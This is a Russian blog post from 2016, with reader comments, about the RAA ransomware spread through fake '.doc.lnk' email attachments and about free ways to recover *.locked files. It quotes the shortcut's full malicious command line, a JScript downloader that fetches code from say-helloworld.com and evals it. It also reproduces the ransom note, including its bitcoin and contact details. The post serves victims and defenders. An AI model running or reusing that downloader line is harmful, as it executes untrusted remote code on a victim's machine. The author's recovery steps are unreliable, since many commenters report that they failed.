вторник, 2 августа 2016 г.

Расшифровка файлов *.locked после вируса

Коротко:
Вирус-шифровальщик  файлов RAA распространяется через почту, шифрует
.doc, .xls, .rtf, .pdf, .zip, .jpg, базы 1С и другие файлы. К зашифрованным файлам вирус добавляет расширение .locked.
Для расшифровки файлов требует денег. Расшифровать файлы самостоятельно можно самому с помощью этих действий.

Подробно:
Пришло сотруднику на почту письмо, в письме был вложен якобы вордовский документ "Для партнеров ТЕНДЕР.doc.lnk". Кстати, названия документов меняются, вирусопускатели используют для них разные имена.

По расширению *.lnk для мало-мальски грамотного человека сразу очевидно, что это ярлык, а не вордовский документ для тендера и открывать оное на своем компьютере чревато.

Но на такое фуфло часто ведутся невежи, как следствие- после "открытия документа" запускается процесс шифрования документов форматов .doc, .xls, .rtf, .pdf, .zip, .jpg, базы 1С и других. К зашифрованным файлам добавляется расширение .locked.
Просто удалить расширение *.locked и нормально открыть зашифрованные файлы в ворде и экселе, например, невозможно- показывает белиберду. Файлы нужно сначала расшифровать.

Для шифрования вирус подключается по интернету к некоемому сайту и шифрует документы по алгоритму, указанному в свойствах ярлыка. Вот командная строка в этом "ярлыке-вирусе":
%windir%\system32\cmd.exe /c REM.>op.js&echo var w=["Msxml2.ServerXMLHTTP.6.0","GET","http://say-helloworld.com/src/gate.php?a","open","send","responseText"];var pp= new ActiveXObject(w[0]);pp[w[3]](w[1],w[2],false);pp[w[4]]();eval(pp[w[5]]);>op.js&op.js

Как видно, идет коннект на сайт http://say-helloworld.com и если заблокировать этот сайт на своем сервере, вирус ничего сделать не сможет.

Вирус сам себя называет "RAA", антивирус Аваст погоняет его как "JS:Downloader-DGA[Trj]":

После шифрования вирус создает на рабочем столе документ "!!!README!!!qUhkZ.rtf" с таким содержанием:


-------------------------------
***ВНИМАНИЕ!***
Ваши файлы были зашифрованы вирусом RAA.
При шифровании был применен алгоритм AES-256, используемый для защиты информации, представляющей государственную тайну.
Это значит, что восстановить данные можно только купив ключ у нас.
Покупка ключа - простейшее дело.
Все, что вам надо:
1. Скинуть ваш ID C4B4C044-7463-4F07-A5AC-63A145632B83 на почтовый адрес raa-consult1@keemail.me.
2. Тестово расшифровать несколько файлов для того, чтоб убедиться, что у нас действительно есть ключ.
3. Оплатить покупку Вашего ключа путем перевода на Bitcoin-адрес 1HkmHv1SHGGaxLSWD1abct1187kVoJUqav.
О том, как купить Bitcoin за рубли с любой карты - https://www.bestchange.ru/visa-mastercard-rur-to-bitcoin.html
4. Получить ключ и программу для расшифровки файлов.
5. Предпринять меры по предотвращению подобных ситуаций в дальнейшем.

Важно (1).
Не пытайтесь подобрать ключ, это бесполезно, и может уничтожить ваши данные окончательно.

Важно (2).
Если по указанному адресу (raa-consult1@keemail.me) вами не был получен ответ в течение 3х часов, вы можете воспользоваться для связи сервисом Bitmessage
(наш адрес - BM-2cVCd439eH5kTS9PzG4NxGUAtSCxLywsnv).
Детальнее о программе - https://bitmessage.org/wiki/Main_Page

Важно (3).
Мы НЕ МОЖЕМ хранить ваши ключи вечно. Все ключи, за которые не было выплачено вознаграждение, удаляются в течение недели с момента заражения.

README файлы расположены в корне каждого диска.

ВАШ ID - C4B4C044-7463-4F07-A5AC-63A145632B83
-------------------------------

Интересно,  что твари не лишены эстетических чувств- раскрасили текст-попрошайку цветными карандашами.

Еще умилил пункт 5: Предпринять меры по предотвращению подобных ситуаций в дальнейшем. Как благородно, ми-ми-ми-ми. Понятно, что подсознательно пареньки понимают, что занимаются нехорошими делами и как бы перекладывают вину на пострадавшего, мол, "ты сам дурак, будь впредь внимателен, а нам скажи спасибо за науку и вообще, не мы такие а жизнь такая".

Но пареньки-вирусописатели пусть тут не обольщаются: своими деяниями они активно минусуют себе карму. И не сейчас, но через 2-3 года, когда запас прочности истощится, награда таки найдет своих героев.

И тогда один из них попадет в поле зрения органов и отправится тренировать дряблую мускулатуру на лесоповалах Мордовии в компании с брутальными почитателями творчества Ивана Кучина, с которыми будет страшно мыться в душе. А другого во время кутежа с ворованными денежками на Цейлоне поймают в рабство тигры освобождения Тамил-Илама и заставят батрачить на выращивании риса с пытками отсутствия интернета и другими противоестественными действиями, о которых не при дамах. Может быть тогда пареньки задумаются, что нужно было не красть чужое, а податься в скрипачи, как советовал дядя Изя. Но это будет потом, а пока парни считают, что поймали бога за бороду и надоят счастья у простофиль.

Несмотря на вышеуказанную писульку, расшифровать документы *.locked можно самому и бесплатно:

1. Заблокировать на сервере предприятия сайт http://say-helloworld.com для избежания новых шифрований.
2. Скачать программы cureit, Kaspersky KVRT, Kaspersky rectordecryptor, Kaspersky rakhnidecryptor.
3. Отключить сеть интернета от компа.
4. Перезагрузиться в безопасном режиме.
5. Поискать вирусы программой cureit и KVRT.
6. Пройтись программой rectordecryptor.
7. Пройтись программой rakhnidecryptor.

Программа rakhnidecryptor подобрала ключ за 23 часа работы(ПК с cpu athlon x2 240, ddr2 2 Gb) и благополучно расшифровала файлы *.locked
С чем и поздравляю вымогателей:

UPD1
Судя по камментам, иногда с помощью указанной процедуры не удается расшифровать файлы. Ну не знаю, у меня все получилось. Могу только посоветовать точно выполнять инструкции: отключить ПК от интернета, вылечить вирус, запустить дешифровщик.

UPD2
У кого получилось расшифровать, напишите в камментах. А то создается впечатление, что только я нормально дешифровал.


20 комментариев:

  1. Всё класс. Статья шикарная. Совет: чуть меньше злобы.

    ОтветитьУдалить
  2. Пробовал много раз все эти свитоперделки от каспера и прочих антивирусов.Ни разу не помогли. Сдается мне все это шняга.

    ОтветитьУдалить
  3. Якобы расшифровало, код подобрало и все файлы восстановило. Но все восстановленные файлы при открытии являются поврежденными и не открываются. Алексей, не знаете, что делать в таком случае?

    ОтветитьУдалить
    Ответы
    1. Не знаю, что посоветовать. У меня расшифровалось хорошо.

      Удалить
    2. та же фигня.. говорит пароль подобран, файлы восстановлены но повреждены. странно что .locked и восстановленный имеют один и тот же объем..

      Удалить
  4. КОД НЕ ПОДОБРАЛО(((((((((((((

    ОтветитьУдалить
  5. Про карму и последствия хорошо сказал))))

    ОтветитьУдалить
  6. Спасибо за совет. Сделал все как описано, потеряно время а в месте с ней и кусочек надежды. Результат нулевай

    ОтветитьУдалить
  7. Здравствуйте на прошлой недели тоже словили этот вирус. Пробовал все дешифраторы на сайте касперского, но не помогли. Нашёл программу shadowexplorer в гугле нашёл и скачал. Прога нашла(а не расшифровала) все абсолютно файлы и 1с тоже, но открываются где-то 80%.Прога работает с теневыми копиями файлов. Если таковая служба не включена то увы не получиться. если что вот ссылка как пользоваться http://winitpro.ru/index.php/2015/12/25/shadowexplorer-utilita-dlya-raboty-s-tenevymi-kopiyami/ И Удачи Вам!

    ОтветитьУдалить
  8. Вирус RAA SEP. Расшифрвка не удалась.. =(

    ОтветитьУдалить
  9. не помогло, рахни ё13 часов дрочил ё файл и в итоге 0 ((( пришлось обращаться в службу техподдержки дрвеба, жду от них ответа

    ОтветитьУдалить
  10. "И тогда один из них попадет в поле зрения органов и отправится тренировать дряблую мускулатуру на лесоповалах Мордовии в компании с брутальными почитателями творчества Ивана Кучина" ааааааааахахахахаха, от души посмеялся

    ОтветитьУдалить
  11. По описанной процедуре расшифровка не удалась

    ОтветитьУдалить
  12. программой rakhnidecryptor был подобран пароль, но комп выключился во время сканирования, при повторном сканировании результат 0, можно как то запустить сканирование и подсунуть пароль который записан в логе?

    ОтветитьУдалить
  13. сканирование не помогло, был подобран пароль только к файлам jpg, но после дешифровки они все равно не открываются, все остальные форматы пароль не подобран

    ОтветитьУдалить
  14. Анонимный16 июня 2017 г., 14:55

    Как вариант восстановить поврежденные файлы без дешифровки: ПКМ по локальному диску, где лежат поврежденные файлы - Свойства - вкладка Предыдущие версии - выбираете версию по дате (когда вируса еще не было), ПКМ по ней, открыть, ищете ваши файлики. По умолчанию диск С должен иметь подобные резервные копии, для других дисков не уверен, но их можно задать: Свойства системы - Дополнительные параметры - вкладка Защита системы.

    ОтветитьУдалить
    Ответы
    1. Анонимный20 июня 2017 г., 10:11

      Современные крипторы трут Shadow Copy. Посему работать юзеры должны как минимум из ограниченной учетной записи.

      Удалить